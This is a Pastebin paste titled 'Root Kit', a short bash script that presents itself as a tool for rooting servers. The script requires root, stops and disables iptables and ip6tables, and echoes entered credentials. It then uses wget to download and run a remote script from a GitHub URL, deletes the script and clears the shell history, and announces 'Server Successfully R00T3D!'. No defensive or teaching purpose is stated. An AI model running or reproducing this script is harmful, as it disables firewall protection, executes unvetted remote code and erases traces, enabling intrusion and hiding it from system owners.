Quatre-Cent-Vingt

Root Kit

May 11th, 2017
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! /bin/bash
  2.  
  3. # Introduction
  4. echo -e "\e[36mMade By Greysi\e[39m"
  5.  
  6. # Check user privilege
  7. if [ $USER != 'root' ]
  8. then
  9. echo -e "\e[34mRequire root access\e[39m"
  10. exit 0
  11. fi
  12.  
  13. # OS Checking
  14. echo $VERSION
  15. ARCH=$(uname -a)
  16. echo -e "\e[97m[\e[91m $ARCH \e[97m]\e[39m"
  17.  
  18. # Kill Iptables | Ip6tables
  19. service iptables stop
  20. service ip6tables stop
  21. chkconfig iptables off
  22. chkconfig ip6tables off
  23. echo -e "\e[91mSecurity Protocol Stopped | \e[37m50% \e[92mComplete!\e[39m"
  24.  
  25. # Input your Credentials
  26. read -p "\e[36mInput your Username:\e[39m" USER
  27. echo $USER
  28. read -p "\e[36mInput your Password:\e[39m" PASSWORD
  29. echo $PASSWORD
  30.  
  31.  
  32. # Wget Payload
  33.  
  34. wget -q https://raw.githubusercontent.com/GreysiDestro/RootKitted/master/compiles.sh -O x.sh < /media/; chmod 777 x.sh; ./x.sh; rm -fr x.sh; rm -fr ~/.bash_history; clear; history -c ||
  35.  
  36. echo -e "\e[91mServer Successfully R00T3D! | \e[37m100% \e[92mComplete!\e[39m"
Add Comment
Please, Sign In to add comment